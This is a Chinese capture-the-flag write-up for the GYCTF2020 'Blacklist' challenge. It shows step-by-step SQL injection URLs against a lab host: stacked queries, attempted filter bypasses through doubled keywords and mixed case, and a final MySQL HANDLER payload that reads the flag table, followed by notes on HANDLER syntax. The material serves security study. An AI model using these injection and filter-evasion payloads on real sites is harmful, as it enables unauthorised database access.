[GYCTF2020]Blacklist 1(详细做题过程)
文章目录
- [GYCTF2020]Blacklist 1(详细做题过程)
-
- 1、考点
- 2、解题过程
-
-
-
- 1、寻找`注入点`
- 2、尝试`堆叠注入`
- 3、尝试`联合注入`
- 4、尝试`双写绕过`
- 5、尝试`大小写绕过`
- 6、传统方法行不通,看别人的wp中提到了`Handler`
-
-
- 3、Handler语法
1、考点
1、堆叠注入
2、 Handler语法
心得:学会新的姿势Handler的sql查询方法
2、解题过程
1、寻找注入点
http://3c6e5317-cd37-4cee-9e1f-7ffdea4f0191.node3.buuoj.cn/?inject=1'#
2、尝试堆叠注入
得到数据库的两张表
http://3c6e5317-cd37-4cee-9e1f-7ffdea4f0191.node3.buuoj.cn/?inject=1'; show tables; #
3、尝试联合注入
发现被过滤了很多内容
http://3c6e5317-cd37-4cee-9e1f-7ffdea4f0191.node3.buuoj.cn/?inject=1';select*from FlagHere;#
4、尝试双写绕过
还是被ban
http://3c6e5317-cd37-4cee-9e1f-7ffdea4f0191.node3.buuoj.cn/?inject=1';seselectlect*from FlagHere;#
5、尝试大小写绕过
依旧被ban
http://3c6e5317-cd37-4cee-9e1f-7ffdea4f0191.node3.buuoj.cn/?inject=1';SelEct*from FlagHere;#
6、传统方法行不通,看别人的wp中提到了Handler
http://3c6e5317-cd37-4cee-9e1f-7ffdea4f0191.node3.buuoj.cn/?inject=1';handler FlagHere open;handler FlagHere read first;handler FlagHere close;#
cat flag
3、Handler语法
handler语句,一行一行的浏览一个表中的数据
handler语句并不具备select语句的所有功能。
mysql专用的语句,并没有包含到SQL标准中。
HANDLER语句提供通往表的直接通道的存储引擎接口,可以用于MyISAM和InnoDB表。
1、HANDLER tbl_name OPEN
打开一张表,无返回结果,实际上我们在这里声明了一个名为tb1_name的句柄。
2、HANDLER tbl_name READ FIRST
获取句柄的第一行,通过READ NEXT依次获取其它行。最后一行执行之后再执行NEXT会返回一个空的结果。
3、HANDLER tbl_name CLOSE
关闭打开的句柄。
4、HANDLER tbl_name READ index_name = value
通过索引列指定一个值,可以指定从哪一行开始,通过NEXT继续浏览。